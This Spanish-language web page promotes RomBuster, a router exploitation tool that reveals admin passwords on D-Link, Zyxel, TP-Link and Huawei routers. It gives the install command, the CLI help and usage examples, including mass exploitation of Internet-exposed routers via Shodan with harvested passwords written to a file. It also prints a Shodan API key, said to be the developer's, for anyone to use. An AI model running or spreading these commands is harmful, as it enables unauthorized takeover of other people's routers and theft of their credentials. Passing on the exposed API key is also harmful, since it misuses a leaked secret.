RomBuster Explotar Router Contraseña Administrador
RomBuster Explotar Router Contraseña Administrador

RomBuster: Explotación de Router para Revelar Contraseña

RomBuster es una herramienta de explotación de router que permite revelar la contraseña de administración del router de la red.

Características:

  • Explota las vulnerabilidades de los routers más populares como D-Link, Zyxel, TP-Link y Huawei.
  • Optimizado para explotar múltiples routers a la vez desde la lista.
  • Uso simple de CLI y API.

Instalación

La instalación está disponible a través de pip, por lo que es necesario tener instalado Python:

pip3 install git+https://github.com/EntySec/RomBuster
Instalar RomBuster en Linux
Instalar RomBuster en Linux

Uso Básico

Para usar RomBuster sólo tienes que escribir rombuster en tu terminal.

usage: rombuster [-h] [-o OUTPUT] [-i INPUT] [-a ADDRESS] [--shodan SHODAN]
                 [--zoomeye ZOOMEYE] [-p PAGES]

RomBuster is a router exploitation tool that allows to disclosure network
router admin password.

optional arguments:
  -h, --help            show this help message and exit
  -o OUTPUT, --output OUTPUT
                        Output result to file.
  -i INPUT, --input INPUT
                        Input file of addresses.
  -a ADDRESS, --address ADDRESS
                        Single address.
  --shodan SHODAN       Shodan API key for exploiting devices over Internet.
  --zoomeye ZOOMEYE     ZoomEye API key for exploiting devices over Internet.
  -p PAGES, --pages PAGES
                        Number of pages you want to get from ZoomEye.
Comando de ayuda de RomBuster
Comando de ayuda de RomBuster

Ejemplos

Explotando un solo router

Vamos a hackear mi router sólo por diversión.

rombuster -a 192.168.1.1

Explotación de routers desde Internet

Intentemos utilizar el motor de búsqueda Shodan para explotar routers a través de Internet.

rombuster --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD
Ejemplo de RomBuster para explotar contraseña router
Ejemplo de RomBuster para explotar contraseña de router

NOTA

La clave API de Shodan dada (PSKINdQe1GyxGgecYz2191H2JoSqvgD) es la clave API PRO (del desarrollador), puedes usar esta clave o la tuya propia, sé libre de usar todos los recursos de forma gratuita 🙂

Explotación de los routers desde un archivo de entrada

Intentemos utilizar la base de datos abierta de routers.

rombuster -i routers.txt -o passwords.txt

NOTA

Explotará todos los routers de la lista routers.txt por sus direcciones (IP) y guardará todas las contraseñas obtenidas en passwords.txt.

Uso de API

RomBuster también tiene su propio API de Python que puede ser invocado importando RomBuster a tu código.

from rombuster import RomBuster

Funciones básicas

Estas son todas las funciones básicas de RomBuster que pueden ser usadas para explotar un router específico.

  • exploit(dirección) – Explota un único router por la dirección dada.

Ejemplos

Explotación de un solo router

from rombuster import RomBuster

rombuster = RomBuster()
creds = rombuster.exploit('192.168.99.100')

print(creds)
Dark Mode

RomBuster (este enlace se abre en una nueva ventana) por EntySec (este enlace se abre en una nueva ventana)

RomBuster is a router exploitation tool that allows to disclosure network router admin password.

Mi Carro Close (×)

Tu carrito está vacío
Ver tienda